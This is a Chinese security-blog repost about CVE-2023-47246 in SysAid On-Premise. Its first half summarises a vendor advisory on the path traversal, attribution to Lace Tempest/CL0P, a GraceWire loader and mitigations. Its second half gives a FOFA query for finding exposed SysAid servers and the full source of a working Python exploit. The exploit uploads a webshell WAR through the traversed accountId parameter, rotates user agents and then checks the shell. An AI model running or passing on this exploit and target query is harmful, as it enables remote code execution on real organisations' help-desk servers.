CTF导航 CTF导航

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

渗透技巧 5个月前 admin
100 0 0

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

介绍

2023 年 11 月 8 日,SysAid 发布了CVE-2023-47246 的通报,涉及其 SysAid On-Premise 软件上的严重零日漏洞。SysAid 将该漏洞描述为导致同一软件执行代码的路径遍历漏洞。该博客包括针对 SysAid On-Premise 软件客户的即时建议、针对此类漏洞的长期防护的最佳实践以及对攻击链的简要分析。

建议

SysAid 建议使用本地软件的客户执行以下两项操作:

  • 升级至版本23.3.6

  • 执行完整的系统和网络评估以检测潜在的危害

如果发现任何妥协迹象 (IoC),Zscaler 建议 SysAid On-Premise 客户遵循事件响应协议并立即采取行动。此外,Zscaler 强烈建议升级到最新版本。有关升级的更多信息,请访问此处和此处。

起因

据信,Lace Tempest (DEV-0950 / TA-505) 是利用此漏洞的威胁行为者。该组织今年早些时候负责利用MoveIT Transfer 漏洞,并与名为“CL0P”的勒索软件组织有关联。

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

图 1:描述威胁行为者利用 CVE-2023-47246 漏洞渗透 SysAid 系统的攻击链

可能的执行

怎么运行的

威胁行为者利用 SysAid CVE-2023-47246 路径遍历漏洞,成功将包含 WebShell 和各种有效负载的 WAR 存档上传到 SysAid Tomcat Web 服务的 Webroot 中。该漏洞位于SysAid com.ilient.server.UserEntry类的doPost方法中。利用此漏洞涉及操纵accountID参数以引入路径遍历,从而允许攻击者确定易受攻击的服务器上编写 WebShell 的位置。该攻击是通过发送 POST 请求来执行的,该请求带有压缩的 WAR 文件,其中包含 WebShell 作为请求正文。随后,威胁参与者获得对 WebShell 的访问权限,使他们能够与受感染的系统进行交互。

用于执行 GraceWire 的 PowerShell

威胁参与者利用未经授权的访问来部署 PowerShell 脚本,以在受害者的计算机上执行 GraceWire 加载程序。 

PowerShell 脚本(如下图所示)枚举C:Program FilesSysAidServertomcatwebappsusersfiles目录中列出的所有文件,然后检查以“Sophos”开头的防病毒或反恶意软件进程。如果脚本检测到受害者系统上运行的对抗性软件,则会退出以避免检测。

如果脚本未检测到防病毒或反恶意软件,则会在受害者的计算机上执行 GraceWire 加载程序 (user.exe)。

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

图 2:用于启动 GraceWire 加载程序的 PowerShell 脚本 (user.exe)

GraceWire 加载程序分析

GraceWire 加载程序遵循一系列步骤。首先,它检查是否存在名为<filename>.bin的文件,其中包含加密的有效负载。如果当前目录中存在该文件,则加载程序将继续使用ReadFile()函数读取其内容,并将数据存储在分配的内存中。随后,它解密加密信息并计算校验和。如果校验和被验证正确,程序将执行解密的bin有效负载。该有效负载旨在部署 GraceWire 木马。此外,加载程序会将 GraceWire 木马注入各种进程,包括:

  • spoolsv.exe

  • msiexec.exe

  • svchost.exe

在检查代码时,我们还发现了调试打印语句,显示了 GraceWire 加载程序的控制流。

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

图 3:调试打印语句的屏幕截图,展示了 GraceWire 加载程序的控制流程

摆脱证据

一旦渗透到受害者的系统中,威胁行为者就会使用另一个 PowerShell 脚本来系统地消除与其恶意活动相关的痕迹和证据。这种后利用策略旨在通过消除妥协指标 (IoC) 来消除数字足迹并最大程度地减少检测的可能性。

可能的其他利用

微软发布了一条推文,强调了 CL0P 勒索软件中此漏洞的利用情况,并强烈建议系统更新。 

此外,SysAid 还发现了支持证据,表明使用了以下 PowerShell 命令来下载和执行 CobaltStrike。

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

图 4:下载并执行 CobaltStrike 的 PowerShell 命令

最佳实践

  • 通过使用Zscaler Private Access限制横向移动来保护皇冠上的宝石应用程序,尤其是在应用程序安全模块打开的情况下。

  • 通过启用附加应用程序安全模块的 Zscaler Private Access 和Zscaler Internet Access路由所有服务器流量,这将提供正确的可见性来识别和阻止来自受感染系统/服务器的恶意活动。

  • 打开Zscaler 高级威胁防护以阻止所有已知的命令和控制域。如果对手利用此漏洞植入恶意软件,这将提供额外的保护。

  • 使用Zscaler 云防火墙(云 IPS 模块)将命令和控制保护扩展到所有端口和协议,包括新兴的 C2 目的地。同样,如果对手利用此漏洞植入恶意软件,这将提供额外的保护。

  • 使用Zscaler 云沙箱来防止作为第二阶段有效负载的一部分传递的未知恶意软件。

  • 确保您正在检查所有 SSL 流量。

  • 限制从允许的已知良好目的地列表到关键基础设施的流量。


FOFA

body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href="http://www.sysaid.com">by SysAid</a>"

https://github.com/W01fh4cker/CVE-2023-47246-EXP/blob/main/CVE-2023-47246-EXP.py

import argparseimport binasciiimport randomimport timeimport zipfileimport zlibimport urllib3import requests
urllib3.disable_warnings()
def compressFile(shellFile, warFile):    try:        with zipfile.ZipFile(warFile, 'w', zipfile.ZIP_DEFLATED) as zipf:            zipf.write(shellFile)        zipf.close()        return True    except:        return False

def getHexData(warFile):    with open(warFile, 'rb') as warfile:        data = warfile.read()    warfile.close()    compressed_data = zlib.compress(data)    hex_data = binascii.hexlify(compressed_data).decode()    return hex_data

def generateRandomDirectoryName(num):    charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'    return ''.join(random.choice(charset) for _ in range(num))

def get_random_agent():    agent_list = [        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7',        'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',        'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17',        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/601.7.8',        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7',        'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0',        'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',        'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50',        'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',        'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',        'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0',        'Mozilla/5.0 (iPad; CPU OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G35 Safari/601.1',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36',        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36',        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393',        'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/537.86.7',        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48',        'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48',        'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',        'Mozilla/5.0 (Windows NT 5.1; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (X11; CrOS x86_64 8350.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',        'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',        'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/52.0.2743.84 Mobile/13G35 Safari/601.1.46',        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',        'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko',        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'    ]    return agent_list[random.randint(0, len(agent_list) - 1)]

def shellUpload(url, proxy, directoryName, shellFile):    userEntryUrl = f"{url}/userentry?accountId=/../../../tomcat/webapps/{directoryName}/&symbolName=test&base64UserName=YWRtaW4="    headers = {        "Content-Type": "application/x-www-form-urlencoded",        "User-Agent": get_random_agent()    }    shellFileName = shellFile.split(".")[0]    warFile = f"{shellFileName}.war"    if compressFile(shellFile, warFile):        shellHex = getHexData(warFile=warFile)        data = binascii.unhexlify(shellHex)        resp = requests.post(url=userEntryUrl, headers=headers, data=data, proxies=proxy, verify=False)        print("33[92m[+] Shell file compressed successfully!33[0m")        return resp    else:        print("33[91m[x] Shell file compression failed.33[0m")        exit(0)

def shellTest(url, proxy, directoryName, shellFile):    userEntryUrl = f"{url}/{directoryName}/{shellFile}"    headers = {        "User-Agent": get_random_agent()    }    resp = requests.get(url=userEntryUrl, headers=headers, timeout=15, proxies=proxy, verify=False)    return resp, userEntryUrl
def exploit(url, proxy, shellFile):    print(f"33[94m[*] start to attack: {url}33[0m")    directoryName = generateRandomDirectoryName(5)    userentryResp = shellUpload(url, proxy, directoryName, shellFile)    print(f"33[94m[*] Wait 9 seconds...33[0m")    time.sleep(9)    cveTestResp, userEntryUrl = shellTest(url, proxy, directoryName, shellFile)    if userentryResp.status_code == 200 and cveTestResp.status_code == 200:        print(f"33[92m[+] The website [{url}] has vulnerability CVE-2023-47246! Shell path: {userEntryUrl}33[0m")    else:        print(f"33[91m[x] The website [{url}] has no vulnerability CVE-2023-47246.33[0m")

if __name__ == "__main__":    banner = """  ______     _______     ____   ___ ____  _____       _  _ _____ ____  _  _    __    / ___    / / ____|   |___  / _ ___ |___ /      | || |___  |___ | || |  / /_  | |      / /|  _| _____ __) | | | |__) | |_  _____| || |_ / /  __) | || |_| '_  | |___   V / | |__|_____/ __/| |_| / __/ ___) |_____|__   _/ /  / __/|__   _| (_) | ____|  _/  |_____|   |_____|___/_____|____/         |_|/_/  |_____|  |_|  ___/                                                                                 Author: W01fh4cker                                                                                Blog: https://w01fh4cker.github.io        """    print(banner)    parser = argparse.ArgumentParser(description="SysAid Server remote code execution vulnerability CVE-2023-47246 Written By W01fh4cker",        add_help="eg: python CVE-2023-47246-RCE.py -u https://192.168.149.150:8443")    parser.add_argument("-u", "--url", help="target URL")    parser.add_argument("-p", "--proxy", help="proxy, eg: http://127.0.0.1:7890")    parser.add_argument("-f", "--file", help="shell file, eg: shell.jsp")    args = parser.parse_args()    if args.url.endswith("/"):        url = args.url[:-1]    else:        url = args.url    if args.proxy:        proxy = {            'http': args.proxy,            'https': args.proxy        }    else:        proxy = {}    exploit(url, proxy, args.file)

感谢您抽出

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

.

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

.

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

来阅读本文

CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

点它,分享点赞在看都在这里

原文始发于微信公众号(Ots安全):CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP)

版权声明:admin 发表于 2023年11月18日 下午1:59。
转载请注明:CVE-2023-47246 SysAid 零日漏洞的覆盖范围报告(EXP) | CTF导航

相关文章

MERCURY and DEV-1084: Destructive attack on hybrid environment
admin
410
Java安全攻防之ActiveMQ从Broker到Consumer
admin
96
该更新一下你的密码字典了
admin
2,434
攻击者利用OAuth令牌窃取私人存储库数据
admin
627
每日安全动态推送(7-18)
admin
214
初探 Struts2 框架安全
admin
32

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

每日安全动态推送(4-28)
0
[代码审计] 某盗U/发卡系统 不知道是几day
0
Cookie-Monster – BOF To Steal Browser Cookies & Credentials
0
How Did I Easily Find Stored XSS at Apple And Earn $5000 ?
0
How I Discovered an RCE Vulnerability in Tesla, Securing a $10,000 Bounty
0
pgAdmin 8.3 Remote Code Execution
0
How I Prevented a Mass Data Breach – $15,000 bounty – @bxmbn
0
The Windows Registry Adventure #1: Introduction and research results
0
使用 VIM 进行代码审计
0
Progress Flowmon 任意命令执行漏洞 CVE-2024-2389
0